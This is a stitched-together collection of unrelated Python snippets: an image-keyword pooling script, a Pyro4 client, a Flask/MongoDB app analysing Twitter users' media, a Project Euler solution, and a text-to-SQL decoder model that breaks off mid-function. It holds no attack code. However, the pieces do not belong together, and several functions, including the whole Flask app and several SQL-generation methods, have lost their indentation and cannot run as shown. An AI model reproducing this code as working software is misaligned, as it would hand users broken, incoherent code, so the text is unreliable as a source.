tg_list_path = '../snapchat/test_list.txt'
with open(tg_list_path,'r') as f:
    tg_im_list = [line.strip() for line in f]
tg_im_n = len(tg_im_list)
tg_feat_n = target.shape[0]
print tg_im_n
print tg_feat_n
nn=10  # number of nearest neighbours to pool keywords from
nbrs = NearestNeighbors(n_neighbors=nn, algorithm='ball_tree').fit(src)
distances, indices = nbrs.kneighbors(target)
print indices.shape
target_n = target.shape[0]
keyword_top = 8  # keep the 8 most frequent keywords per target image
top_words = []
for i in xrange(target_n):
    #print image_list[indices[i][0]]
    # Pool the keywords of the nn nearest source images and keep the
    # most common ones.  NOTE(review): [:-6] presumably strips a file
    # extension/suffix from the list entry and the last path component
    # is the keywords-dict key -- confirm against the list file format.
    keywords_c =list(itertools.chain(* [keywords[image_list[indices[i][x]][:-6].split('/')[-1]] \
        for x in xrange(nn)]))
    keywords_count = Counter(keywords_c)
    most_c = keywords_count.most_common(keyword_top)
    top_words.append([item[0] for item in most_c])
sav_file = '../snapchat/keywords_res.txt'
#print tg_im_list[0]
#print ' '.join(top_words[0])
with open(sav_file,'w') as f:
    for i in xrange(target_n):
        # NOTE(review): [:-2] trims a trailing suffix from the stored
        # list entry -- confirm against test_list.txt.
        f.write('%s %s\n' % (tg_im_list[i][:-2],' '.join(top_words[i])))
|
# Client that doesn't use the Name Server. Uses URI directly.
from __future__ import print_function
import sys
import Pyro4

# On Python 2, raw_input is the equivalent of Python 3's input().
if sys.version_info < (3, 0):
    input = raw_input

uri = input("Enter the URI of the quote object: ")
with Pyro4.core.Proxy(uri) as quotegen:
    print("Getting some quotes...")
    for _ in range(2):
        print(quotegen.quote())
|
# stdlib
import datetime
from collections import Counter

# third-party
from flask import Flask, jsonify, request, current_app, send_from_directory
from pymongo import MongoClient

# local
import twitter_to_movie as t2m
# static_url_path='' serves the package's static files from the URL root.
app = Flask(__name__, static_url_path='')
@app.route("/", methods=["GET"])
def send_index():
return send_from_directory('', 'index.html')
@app.route("/output.mp4", methods=["GET"])
def send_html():
return send_from_directory('', "output.mp4")
@app.route("/api/histo", methods=["GET"])
def get_histo():
client = MongoClient()
db = client["db"]
users = db["twitter"]
cursor = users.find({})
labels = []
for document in cursor:
if "phrases" in document.keys():
for ele in document["phrases"]:
labels += ele.split(">")
histd = {}
for label in labels:
if label in histd.keys():
histd[label] += 1
else:
histd[label] = 1
li = []
for key in histd.keys():
li.append([key, histd[key]])
li = sorted(li, key=lambda x: x[1])[::-1]
li2 = []
for key in histd.keys():
li2.append({"label": key, "y": histd[key]})
li2 = sorted(li2, key=lambda x: x["y"])[::-1]
return jsonify(dict(histo=histd, arr=li, ss=li2))
@app.route("/api/getlabels", methods=["GET"])
def get_labels():
try:
name = request.args.get("name", None)
if name is None:
return jsonify({"error": "No screenname specified"})
else:
print(name)
labels, images = t2m.get_twitter_media_analysis(name,
count=200,
exclude_replies=True,
delete_movie=False)
phrases = []
for lab in labels:
[phrases.append(x[0]) for x in lab["labels"]]
client = MongoClient()
db = client["db"]
users = db["twitter"]
users.insert_one(dict(handle=name, num_images=len(images), images=images, phrases=phrases, labels=labels, time=datetime.datetime.now().strftime("%Y/%m/%d %H:%M")))
client.close()
return jsonify(labels)
except Exception as e:
return jsonify({"error":str(e)})
if __name__ == "__main__":
app.run(host="localhost", use_reloader=False, threaded=True, port=3000) |
def SumFunc(num, multiples=(3, 5)):
    """Return the sum of all naturals below *num* divisible by any of *multiples*.

    With the defaults this is Project Euler problem 1 ("multiples of 3
    and 5").  The divisor set is parameterised (backward-compatibly) so
    the same helper works for other problems.

    Args:
        num: exclusive upper bound.
        multiples: divisors to test against; defaults to (3, 5).

    Returns:
        Sum of every i in [0, num) with i % m == 0 for some m.
    """
    return sum(i for i in range(num)
               if any(i % m == 0 for m in multiples))
# Project Euler #1: sum of multiples of 3 or 5 below 1000.
print(SumFunc(1000))
|
import json
import torch
import datetime
import time
import argparse
import numpy as np
import torch.nn as nn
import traceback
from collections import defaultdict
from utils.word_embedding import WordEmbedding
from models.agg_predictor import AggPredictor
from models.col_predictor import ColPredictor
from models.desasc_limit_predictor import DesAscLimitPredictor
from models.having_predictor import HavingPredictor
from models.keyword_predictor import KeyWordPredictor
from models.multisql_predictor import MultiSqlPredictor
from models.root_teminal_predictor import RootTeminalPredictor
from models.andor_predictor import AndOrPredictor
from models.op_predictor import OpPredictor
from preprocess_data import index_to_column_name
# Decoder vocabularies: indices predicted by the modules are looked up
# in these tuples.
SQL_OPS = ('none', 'intersect', 'union', 'except')  # set ops between sub-queries
KW_OPS = ('where', 'groupBy', 'orderBy')  # optional top-level clauses
AGG_OPS = ('max', 'min', 'count', 'sum', 'avg')  # aggregation functions
ROOT_TERM_OPS = ("root", "terminal")  # condition value: nested query vs literal
COND_OPS = ("and", "or")  # connectors between WHERE conditions
# (direction, has_limit) combinations for ORDER BY decoding
DEC_ASC_OPS = (("asc", True), ("asc", False), ("desc", True), ("desc", False))
# Comparison operators for WHERE/HAVING conditions
NEW_WHERE_OPS = (
    '=',
    '>',
    '<',
    '>=',
    '<=',
    '!=',
    'like',
    'not in',
    'in',
    'between')
# Clause keys whose entries contain column references (used by gen_sql)
KW_WITH_COL = ("select", "where", "groupBy", "orderBy", "having")
class Stack:
    """Minimal LIFO stack over a Python list (top of stack at the end)."""

    def __init__(self):
        self.items = []

    def isEmpty(self):
        """Return True when the stack holds no items."""
        # Truthiness test instead of comparing against a fresh [].
        return not self.items

    def push(self, item):
        """Place *item* on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item (IndexError when empty)."""
        return self.items.pop()

    def peek(self):
        """Return the top item without removing it (IndexError when empty)."""
        # Negative indexing instead of items[len(items) - 1].
        return self.items[-1]

    def size(self):
        """Return the number of stacked items."""
        return len(self.items)

    def insert(self, i, x):
        """Insert *x* at position *i* (list semantics); returns None."""
        return self.items.insert(i, x)
def to_batch_tables(tables, B, table_type):
    """Build the per-batch column-description sequence for one schema.

    For every column in ``tables["column_names"]`` a token list is
    produced as ``[column_type, table-name tokens..., column tokens...]``.
    Table tokens already occurring in the column name are skipped; the
    special table id -1 maps to the single token "all"; table tokens are
    omitted entirely when ``table_type == "no"``.  The same per-schema
    list is replicated B times, once per batch element.

    Args:
        tables: schema dict with "table_names", "column_names"
            (list of (table_id, column_name)) and "column_types".
        B: batch size.
        table_type: "no" to omit table-name tokens, anything else
            (e.g. "std") to include them.

    Returns:
        List of B identical per-column token-list sequences.
    """
    table_names = tables["table_names"]
    column_names = tables["column_names"]
    column_types = tables["column_types"]

    tname_toks = [name.split(" ") for name in table_names]
    cols = [col.split(" ") for _, col in column_names]
    tab_seq = [tid for tid, _ in column_names]

    cols_add = []
    for tid, col, ct in zip(tab_seq, cols, column_types):
        col_one = [ct]
        if tid == -1:
            tabn = ["all"]
        elif table_type == "no":
            tabn = []
        else:
            tabn = tname_toks[tid]
        # Prefix table tokens that are not already part of the column name.
        for t in tabn:
            if t not in col:
                col_one.append(t)
        col_one.extend(col)
        cols_add.append(col_one)
    # Every batch element shares the same (read-only) schema description.
    return [cols_add] * B
class SuperModel(nn.Module):
    """End-to-end text-to-SQL decoder built from per-clause predictors.

    Each sub-module predicts one piece of the SQL sketch (set operation,
    clause keywords, columns, operators, aggregations, ORDER BY
    direction/limit, HAVING presence, AND/OR connectors).
    ``full_forward`` drives them with a stack-based grammar and collects
    the result into a nested dict, which ``gen_sql`` renders to SQL.
    """

    def __init__(
            self,
            word_emb,
            col_emb,
            N_word,
            N_col,
            N_h,
            N_depth,
            dropout,
            gpu=True,
            trainable_emb=False,
            table_type="std",
            use_hs=True):
        """Construct all predictor modules (each left in eval mode).

        Args:
            word_emb: pretrained word-embedding table for questions.
            col_emb: optional separate embedding table for column
                tokens; falsy reuses the question embedding layer
                (N_col is then forced to None).
            N_word: word embedding dimension.
            N_col: column embedding dimension.
            N_h: predictor hidden size.
            N_depth: predictor LSTM depth.
            dropout: dropout rate passed to every predictor.
            gpu: move the whole model to CUDA when True.
            trainable_emb: fine-tune the embedding tables when True.
            table_type: column-description style for to_batch_tables
                ("std" includes table-name tokens, "no" omits them).
            use_hs: feed the decoding-history encoding to predictors.
        """
        super(SuperModel, self).__init__()
        self.gpu = gpu
        self.N_h = N_h
        self.N_depth = N_depth
        self.dropout = dropout
        self.trainable_emb = trainable_emb
        self.table_type = table_type
        self.use_hs = use_hs
        self.SQL_TOK = [
            '<UNK>',
            '<END>',
            'WHERE',
            'AND',
            'EQL',
            'GT',
            'LT',
            '<BEG>']
        # word embedding layer
        self.embed_layer = WordEmbedding(word_emb, N_word, gpu,
                                         self.SQL_TOK, trainable=trainable_emb)
        # Questions always use the word table, even when a separate
        # column table replaces self.embed_layer below.
        self.q_embed_layer = self.embed_layer
        if not col_emb:
            N_col = None
        else:
            self.embed_layer = WordEmbedding(
                col_emb, N_col, gpu, self.SQL_TOK, trainable=trainable_emb)
        # initial all modules
        # NOTE: every predictor is switched to eval() right after
        # construction -- this model is built for inference.
        self.multi_sql = MultiSqlPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.multi_sql.eval()
        self.key_word = KeyWordPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.key_word.eval()
        self.col = ColPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.col.eval()
        self.op = OpPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.op.eval()
        self.agg = AggPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.agg.eval()
        self.root_teminal = RootTeminalPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.root_teminal.eval()
        self.des_asc = DesAscLimitPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.des_asc.eval()
        self.having = HavingPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.having.eval()
        self.andor = AndOrPredictor(
            N_word=N_word,
            N_col=N_col,
            N_h=N_h,
            N_depth=N_depth,
            dropout=dropout,
            gpu=gpu,
            use_hs=use_hs)
        self.andor.eval()
        # Loss/activation helpers (unused during pure inference).
        self.softmax = nn.Softmax()  # dim=1
        self.CE = nn.CrossEntropyLoss()
        self.log_softmax = nn.LogSoftmax()
        self.mlsml = nn.MultiLabelSoftMarginLoss()
        self.bce_logit = nn.BCEWithLogitsLoss()
        self.sigm = nn.Sigmoid()
        if gpu:
            self.cuda()
        # Counts schemas where no foreign-key join path could be found.
        self.path_not_found = 0
    def forward(self, q_seq, history, tables):
        """Decode a batch of questions into nested SQL dicts.

        Thin wrapper kept for the nn.Module interface; delegates to
        ``full_forward``.
        """
        # if self.part:
        #     return self.part_forward(q_seq,history,tables)
        # else:
        return self.full_forward(q_seq, history, tables)
    def full_forward(self, q_seq, history, tables):
        """Run the grammar-guided decoding loop for one batch.

        Maintains an explicit stack of pending grammar symbols ("root",
        clause keywords, ("col", kw), ("op", ...), ("agg", ...), ...)
        and queries the matching predictor module for each, assembling
        the decoded query into the nested ``current_sql`` dict.

        Returns:
            The decoded SQL dict, or None when decoding exceeded the
            2-second safety timeout.

        NOTE(review): predictor outputs are read with score[0], i.e.
        only batch element 0 is decoded even though embeddings are built
        for the whole batch -- confirm B is effectively 1 at inference.
        """
        B = len(q_seq)
        # print("q_seq:{}".format(q_seq))
        # print("Batch size:{}".format(B))
        q_emb_var, q_len = self.q_embed_layer.gen_x_q_batch(q_seq)
        col_seq = to_batch_tables(tables, B, self.table_type)
        col_emb_var, col_name_len, col_len = self.embed_layer.gen_col_batch(
            col_seq)
        mkw_emb_var = self.embed_layer.gen_word_list_embedding(
            ["none", "except", "intersect", "union"], (B))
        mkw_len = np.full(q_len.shape, 4, dtype=np.int64)
        kw_emb_var = self.embed_layer.gen_word_list_embedding(
            ["where", "group by", "order by"], (B))
        kw_len = np.full(q_len.shape, 3, dtype=np.int64)
        stack = Stack()
        stack.push(("root", None))
        # NOTE(review): [["root"]] * B shares ONE inner list across the
        # batch; only history[0] is ever used below, so this is benign.
        history = [["root"]] * B
        andor_cond = ""
        has_limit = False
        # sql = {}
        current_sql = {}
        sql_stack = []
        idx_stack = []
        kw_stack = []
        kw = ""
        nested_label = ""
        has_having = False
        timeout = time.time() + 2  # set timer to prevent infinite recursion in SQL generation
        failed = False
        while not stack.isEmpty():
            if time.time() > timeout:
                failed = True
                break
            vet = stack.pop()
            # print(vet)
            hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(history)
            # Returning from a nested sub-query: restore the parent
            # query context saved when the nested root was pushed.
            if len(idx_stack) > 0 and stack.size() < idx_stack[-1]:
                # print("pop!!!!!!!!!!!!!!!!!!!!!!")
                idx_stack.pop()
                current_sql = sql_stack.pop()
                kw = kw_stack.pop()
                # current_sql = current_sql["sql"]
            # history.append(vet)
            # print("hs_emb:{} hs_len:{}".format(hs_emb_var.size(),hs_len.size()))
            if isinstance(vet, tuple) and vet[0] == "root":
                if history[0][-1] != "root":
                    history[0].append("root")
                    hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(
                        history)
                if vet[1] != "original":
                    idx_stack.append(stack.size())
                    sql_stack.append(current_sql)
                    kw_stack.append(kw)
                else:
                    idx_stack.append(stack.size())
                    sql_stack.append(sql_stack[-1])
                    kw_stack.append(kw)
                if "sql" in current_sql:
                    current_sql["nested_sql"] = {}
                    current_sql["nested_label"] = nested_label
                    current_sql = current_sql["nested_sql"]
                elif isinstance(vet[1], dict):
                    vet[1]["sql"] = {}
                    current_sql = vet[1]["sql"]
                elif vet[1] != "original":
                    current_sql["sql"] = {}
                    current_sql = current_sql["sql"]
                # print("q_emb_var:{} hs_emb_var:{} mkw_emb_var:{}".format(q_emb_var.size(),hs_emb_var.size(),mkw_emb_var.size()))
                if vet[1] == "nested" or vet[1] == "original":
                    stack.push("none")
                    history[0].append("none")
                else:
                    # Predict the set operation joining sub-queries.
                    score = self.multi_sql.forward(
                        q_emb_var, q_len, hs_emb_var, hs_len, mkw_emb_var, mkw_len)
                    label = np.argmax(score[0].data.cpu().numpy())
                    label = SQL_OPS[label]
                    history[0].append(label)
                    stack.push(label)
                    if label != "none":
                        nested_label = label
            elif vet in ('intersect', 'except', 'union'):
                stack.push(("root", "nested"))
                stack.push(("root", "original"))
                # history[0].append("root")
            elif vet == "none":
                # Predict which optional clauses (where/groupBy/orderBy)
                # the query needs.
                score = self.key_word.forward(
                    q_emb_var, q_len, hs_emb_var, hs_len, kw_emb_var, kw_len)
                kw_num_score, kw_score = [x.data.cpu().numpy() for x in score]
                # print("kw_num_score:{}".format(kw_num_score))
                # print("kw_score:{}".format(kw_score))
                num_kw = np.argmax(kw_num_score[0])
                kw_score = list(np.argsort(-kw_score[0])[:num_kw])
                kw_score.sort(reverse=True)
                # print("num_kw:{}".format(num_kw))
                # NOTE(review): the loop variable shadows the outer
                # ``kw`` clause name; it is reset when a clause keyword
                # is popped, so this appears intentional-but-fragile.
                for kw in kw_score:
                    stack.push(KW_OPS[kw])
                stack.push("select")
            elif vet in ("select", "orderBy", "where", "groupBy", "having"):
                kw = vet
                current_sql[kw] = []
                history[0].append(vet)
                stack.push(("col", vet))
                # score = self.andor.forward(q_emb_var,q_len,hs_emb_var,hs_len)
                # label = score[0].data.cpu().numpy()
                # andor_cond = COND_OPS[label]
                # history.append("")
            # elif vet == "groupBy":
            #     score = self.having.forward(q_emb_var,q_len,hs_emb_var,hs_len,col_emb_var,col_len,)
            elif isinstance(vet, tuple) and vet[0] == "col":
                # print("q_emb_var:{} hs_emb_var:{} col_emb_var:{}".format(q_emb_var.size(), hs_emb_var.size(),col_emb_var.size()))
                score = self.col.forward(
                    q_emb_var,
                    q_len,
                    hs_emb_var,
                    hs_len,
                    col_emb_var,
                    col_len,
                    col_name_len)
                col_num_score, col_score = [
                    x.data.cpu().numpy() for x in score]
                col_num = np.argmax(col_num_score[0]) + 1  # double check
                cols = np.argsort(-col_score[0])[:col_num]
                # print(col_num)
                # print("col_num_score:{}".format(col_num_score))
                # print("col_score:{}".format(col_score))
                for col in cols:
                    if vet[1] == "where":
                        stack.push(("op", "where", col))
                    elif vet[1] != "groupBy":
                        stack.push(("agg", vet[1], col))
                    elif vet[1] == "groupBy":
                        history[0].append(index_to_column_name(col, tables))
                        current_sql[kw].append(
                            index_to_column_name(col, tables))
                # predict and or or when there is multi col in where condition
                if col_num > 1 and vet[1] == "where":
                    score = self.andor.forward(
                        q_emb_var, q_len, hs_emb_var, hs_len)
                    label = np.argmax(score[0].data.cpu().numpy())
                    andor_cond = COND_OPS[label]
                    current_sql[kw].append(andor_cond)
                if vet[1] == "groupBy" and col_num > 0:
                    # Decide whether the GROUP BY needs a HAVING clause.
                    score = self.having.forward(
                        q_emb_var,
                        q_len,
                        hs_emb_var,
                        hs_len,
                        col_emb_var,
                        col_len,
                        col_name_len,
                        np.full(
                            B,
                            cols[0],
                            dtype=np.int64))
                    label = np.argmax(score[0].data.cpu().numpy())
                    if label == 1:
                        has_having = (label == 1)
                        # stack.insert(-col_num,"having")
                        stack.push("having")
                # history.append(index_to_column_name(cols[-1], tables[0]))
            elif isinstance(vet, tuple) and vet[0] == "agg":
                history[0].append(index_to_column_name(vet[2], tables))
                if vet[1] not in ("having", "orderBy"):  # DEBUG-ed 20180817
                    try:
                        current_sql[kw].append(
                            index_to_column_name(vet[2], tables))
                    except Exception as e:
                        # print(e)
                        traceback.print_exc()
                        print(
                            "history:{},current_sql:{} stack:{}".format(
                                history[0], current_sql, stack.items))
                        print("idx_stack:{}".format(idx_stack))
                        print("sql_stack:{}".format(sql_stack))
                        exit(1)
                hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(
                    history)
                score = self.agg.forward(
                    q_emb_var,
                    q_len,
                    hs_emb_var,
                    hs_len,
                    col_emb_var,
                    col_len,
                    col_name_len,
                    np.full(
                        B,
                        vet[2],
                        dtype=np.int64))
                agg_num_score, agg_score = [
                    x.data.cpu().numpy() for x in score]
                agg_num = np.argmax(agg_num_score[0])  # double check
                agg_idxs = np.argsort(-agg_score[0])[:agg_num]
                # print("agg:{}".format([AGG_OPS[agg] for agg in agg_idxs]))
                if len(agg_idxs) > 0:
                    history[0].append(AGG_OPS[agg_idxs[0]])
                    if vet[1] not in ("having", "orderBy"):
                        current_sql[kw].append(AGG_OPS[agg_idxs[0]])
                    elif vet[1] == "orderBy":
                        # DEBUG-ed 20180817
                        stack.push(("des_asc", vet[2], AGG_OPS[agg_idxs[0]]))
                    else:
                        stack.push(
                            ("op", "having", vet[2], AGG_OPS[agg_idxs[0]]))
                for agg in agg_idxs[1:]:
                    history[0].append(index_to_column_name(vet[2], tables))
                    history[0].append(AGG_OPS[agg])
                    if vet[1] not in ("having", "orderBy"):
                        current_sql[kw].append(
                            index_to_column_name(vet[2], tables))
                        current_sql[kw].append(AGG_OPS[agg])
                    elif vet[1] == "orderBy":
                        stack.push(("des_asc", vet[2], AGG_OPS[agg]))
                    else:
                        stack.push(("op", "having", vet[2], agg_idxs))
                if len(agg_idxs) == 0:
                    if vet[1] not in ("having", "orderBy"):
                        current_sql[kw].append("none_agg")
                    elif vet[1] == "orderBy":
                        stack.push(("des_asc", vet[2], "none_agg"))
                    else:
                        stack.push(("op", "having", vet[2], "none_agg"))
                # current_sql[kw].append([AGG_OPS[agg] for agg in agg_idxs])
                # if vet[1] == "having":
                #     stack.push(("op","having",vet[2],agg_idxs))
                # if vet[1] == "orderBy":
                #     stack.push(("des_asc",vet[2],agg_idxs))
                # if vet[1] == "groupBy" and has_having:
                #     stack.push("having")
            elif isinstance(vet, tuple) and vet[0] == "op":
                if vet[1] == "where":
                    # current_sql[kw].append(index_to_column_name(vet[2], tables))
                    history[0].append(index_to_column_name(vet[2], tables))
                    hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(
                        history)
                score = self.op.forward(
                    q_emb_var,
                    q_len,
                    hs_emb_var,
                    hs_len,
                    col_emb_var,
                    col_len,
                    col_name_len,
                    np.full(
                        B,
                        vet[2],
                        dtype=np.int64))
                op_num_score, op_score = [x.data.cpu().numpy() for x in score]
                # num_score 0 maps to 1 in truth, must have at least one op
                op_num = np.argmax(op_num_score[0]) + 1
                ops = np.argsort(-op_score[0])[:op_num]
                # current_sql[kw].append([NEW_WHERE_OPS[op] for op in ops])
                if op_num > 0:
                    history[0].append(NEW_WHERE_OPS[ops[0]])
                    if vet[1] == "having":
                        stack.push(("root_teminal", vet[2], vet[3], ops[0]))
                    else:
                        stack.push(("root_teminal", vet[2], ops[0]))
                    # current_sql[kw].append(NEW_WHERE_OPS[ops[0]])
                for op in ops[1:]:
                    history[0].append(index_to_column_name(vet[2], tables))
                    history[0].append(NEW_WHERE_OPS[op])
                    # current_sql[kw].append(index_to_column_name(vet[2], tables))
                    # current_sql[kw].append(NEW_WHERE_OPS[op])
                    if vet[1] == "having":
                        stack.push(("root_teminal", vet[2], vet[3], op))
                    else:
                        stack.push(("root_teminal", vet[2], op))
                # stack.push(("root_teminal",vet[2]))
            elif isinstance(vet, tuple) and vet[0] == "root_teminal":
                # Decide whether the condition value is a literal
                # ("terminal") or a nested query ("root").
                score = self.root_teminal.forward(
                    q_emb_var,
                    q_len,
                    hs_emb_var,
                    hs_len,
                    col_emb_var,
                    col_len,
                    col_name_len,
                    np.full(
                        B,
                        vet[1],
                        dtype=np.int64))
                label = np.argmax(score[0].data.cpu().numpy())
                label = ROOT_TERM_OPS[label]
                if len(vet) == 4:
                    current_sql[kw].append(
                        index_to_column_name(vet[1], tables))
                    current_sql[kw].append(vet[2])
                    current_sql[kw].append(NEW_WHERE_OPS[vet[3]])
                else:
                    # print("kw:{}".format(kw))
                    try:
                        current_sql[kw].append(
                            index_to_column_name(vet[1], tables))
                    except Exception as e:
                        # print(e)
                        traceback.print_exc()
                        print(
                            "history:{},current_sql:{} stack:{}".format(
                                history[0], current_sql, stack.items))
                        print("idx_stack:{}".format(idx_stack))
                        print("sql_stack:{}".format(sql_stack))
                        exit(1)
                    current_sql[kw].append(NEW_WHERE_OPS[vet[2]])
                if label == "root":
                    history[0].append("root")
                    current_sql[kw].append({})
                    # current_sql = current_sql[kw][-1]
                    stack.push(("root", current_sql[kw][-1]))
                else:
                    current_sql[kw].append("terminal")
            elif isinstance(vet, tuple) and vet[0] == "des_asc":
                current_sql[kw].append(index_to_column_name(vet[1], tables))
                current_sql[kw].append(vet[2])
                score = self.des_asc.forward(
                    q_emb_var,
                    q_len,
                    hs_emb_var,
                    hs_len,
                    col_emb_var,
                    col_len,
                    col_name_len,
                    np.full(
                        B,
                        vet[1],
                        dtype=np.int64))
                label = np.argmax(score[0].data.cpu().numpy())
                dec_asc, has_limit = DEC_ASC_OPS[label]
                history[0].append(dec_asc)
                current_sql[kw].append(dec_asc)
                current_sql[kw].append(has_limit)
        # print("{}".format(current_sql))
        if failed:
            return None
        print("history:{}".format(history[0]))
        if len(sql_stack) > 0:
            current_sql = sql_stack[0]
        # print("{}".format(current_sql))
        return current_sql
def gen_col(self, col, table, table_alias_dict):
colname = table["column_names_original"][col[2]][1]
table_idx = table["column_names_original"][col[2]][0]
if table_idx not in table_alias_dict:
return colname
return "T{}.{}".format(table_alias_dict[table_idx], colname)
def gen_group_by(self, sql, kw, table, table_alias_dict):
ret = []
for i in range(0, len(sql)):
# if len(sql[i+1]) == 0:
# if sql[i+1] == "none_agg":
ret.append(self.gen_col(sql[i], table, table_alias_dict))
# else:
# ret.append("{}({})".format(sql[i+1], self.gen_col(sql[i], table, table_alias_dict)))
# for agg in sql[i+1]:
# ret.append("{}({})".format(agg,gen_col(sql[i],table,table_alias_dict)))
return "{} {}".format(kw, ",".join(ret))
    def gen_select(self, sql, kw, table, table_alias_dict):
        """Render a SELECT clause from alternating (column, aggregation) pairs.

        A "none_agg" (or non-string) aggregation renders the bare
        column; otherwise the column is wrapped in the aggregation.

        NOTE(review): ``basestring`` is Python 2 only -- on Python 3
        this raises NameError unless a compatibility shim is defined.
        """
        ret = []
        for i in range(0, len(sql), 2):
            # if len(sql[i+1]) == 0:
            if sql[i +
                   1] == "none_agg" or not isinstance(sql[i +
                                                          1], basestring):  # DEBUG-ed 20180817
                ret.append(self.gen_col(sql[i], table, table_alias_dict))
            else:
                ret.append("{}({})".format(
                    sql[i + 1], self.gen_col(sql[i], table, table_alias_dict)))
            # for agg in sql[i+1]:
            #     ret.append("{}({})".format(agg,gen_col(sql[i],table,table_alias_dict)))
        return "{} {}".format(kw, ",".join(ret))
    def gen_where(self, sql, table, table_alias_dict):
        """Render a WHERE clause.

        ``sql`` is optionally prefixed with an "and"/"or" connector,
        followed by (column, operator, value) triples.  A value other
        than "terminal" is a nested query dict rendered via gen_sql.

        NOTE(review): ``basestring`` is Python 2 only.
        """
        if len(sql) == 0:
            return ""
        start_idx = 0
        andor = "and"
        if isinstance(sql[0], basestring):
            start_idx += 1
            andor = sql[0]
        ret = []
        for i in range(start_idx, len(sql), 3):
            # rewrite to stop a bug
            if i + 2 < len(sql):
                col = self.gen_col(sql[i], table, table_alias_dict)
                op = sql[i + 1]
                val = sql[i + 2]
                where_item = ""
            else:
                # incomplete trailing triple -- drop it
                break
            if val == "terminal":
                # literal placeholder value
                where_item = "{} {} '{}'".format(col, op, val)
            else:
                val = self.gen_sql(val, table)
                where_item = "{} {} ({})".format(col, op, val)
            if op == "between":
                # TODO temprarily fixed
                where_item += " and 'terminal'"
            ret.append(where_item)
        return "where {}".format(" {} ".format(andor).join(ret))
    def gen_orderby(self, sql, table, table_alias_dict):
        """Render an ORDER BY clause (with an optional "limit 1").

        ``sql`` holds (column, agg, direction, has_limit) groups; the
        trailing element of the list switches the LIMIT on.

        NOTE(review): ``basestring`` is Python 2 only.
        """
        ret = []
        limit = ""
        if sql[-1]:
            limit = "limit 1"
        for i in range(0, len(sql), 4):
            if sql[i +
                   1] == "none_agg" or not isinstance(sql[i +
                                                          1], basestring):  # DEBUG-ed 20180817
                ret.append("{} {}".format(self.gen_col(
                    sql[i], table, table_alias_dict), sql[i + 2]))
            else:
                ret.append("{}({}) {}".format(
                    sql[i + 1], self.gen_col(sql[i], table, table_alias_dict), sql[i + 2]))
        return "order by {} {}".format(",".join(ret), limit)
def gen_having(self, sql, table, table_alias_dict):
ret = []
for i in range(0, len(sql), 4):
if sql[i + 1] == "none_agg":
col = self.gen_col(sql[i], table, table_alias_dict)
else:
col = "{}({})".format(
sql[i + 1], self.gen_col(sql[i], table, table_alias_dict))
op = sql[i + 2]
val = sql[i + 3]
if val == "terminal":
ret.append("{} {} '{}'".format(col, op, val))
else:
val = self.gen_sql(val, table)
ret.append("{} {} ({})".format(col, op, val))
return "having {}".format(",".join(ret))
def find_shortest_path(self, start, end, graph):
stack = [[start, []]]
visited = set()
while len(stack) > 0:
ele, history = stack.pop()
if ele == end:
return history
for node in graph[ele]:
if node[0] not in visited:
stack.append((node[0], history + [(node[0], node[1])]))
visited.add(node[0])
print("table {} table {}".format(start, end))
# print("could not find path!!!!!{}".format(self.path_not_found))
self.path_not_found += 1
# return []
    def gen_from(self, candidate_tables, table):
        """Build the FROM clause joining every table referenced by the query.

        Args:
            candidate_tables: set of table indices appearing in the
                decoded query's column references.
            table: the schema dict of the current database.

        Returns:
            ``(table_alias_dict, from_clause)`` -- a mapping from table
            index to alias number (rendered as T1, T2, ...) plus the
            rendered clause.  Tables are connected along foreign-key
            paths found by ``find_shortest_path``; a table with no path
            is joined without an ON condition.
        """
        def find(d, col):
            # union-find "find" -- kept from an earlier join strategy;
            # currently unused together with ``union`` below
            if d[col] == -1:
                return col
            return find(d, d[col])

        def union(d, c1, c2):
            r1 = find(d, c1)
            r2 = find(d, c2)
            if r1 == r2:
                return
            d[r1] = r2
        ret = ""
        # Zero or one table: no join machinery (and no aliases) needed.
        if len(candidate_tables) <= 1:
            if len(candidate_tables) == 1:
                ret = "from {}".format(
                    table["table_names_original"][list(candidate_tables)[0]])
            else:
                ret = "from {}".format(table["table_names_original"][0])
                # TODO: temporarily settings
            return {}, ret
        # print("candidate:{}".format(candidate_tables))
        table_alias_dict = {}
        uf_dict = {}
        for t in candidate_tables:
            uf_dict[t] = -1
        idx = 1
        # Undirected foreign-key graph between tables.
        graph = defaultdict(list)
        for acol, bcol in table["foreign_keys"]:
            t1 = table["column_names"][acol][0]
            t2 = table["column_names"][bcol][0]
            graph[t1].append((t2, (acol, bcol)))
            graph[t2].append((t1, (bcol, acol)))
            # if t1 in candidate_tables and t2 in candidate_tables:
            #     r1 = find(uf_dict,t1)
            #     r2 = find(uf_dict,t2)
            #     if r1 == r2:
            #         continue
            #     union(uf_dict,t1,t2)
            #     if len(ret) == 0:
            #         ret = "from {} as T{} join {} as T{} on T{}.{}=T{}.{}".format(table["table_names"][t1],idx,table["table_names"][t2],
            #                                                                       idx+1,idx,table["column_names_original"][acol][1],idx+1,
            #                                                                       table["column_names_original"][bcol][1])
            #         table_alias_dict[t1] = idx
            #         table_alias_dict[t2] = idx+1
            #         idx += 2
            #     else:
            #         if t1 in table_alias_dict:
            #             old_t = t1
            #             new_t = t2
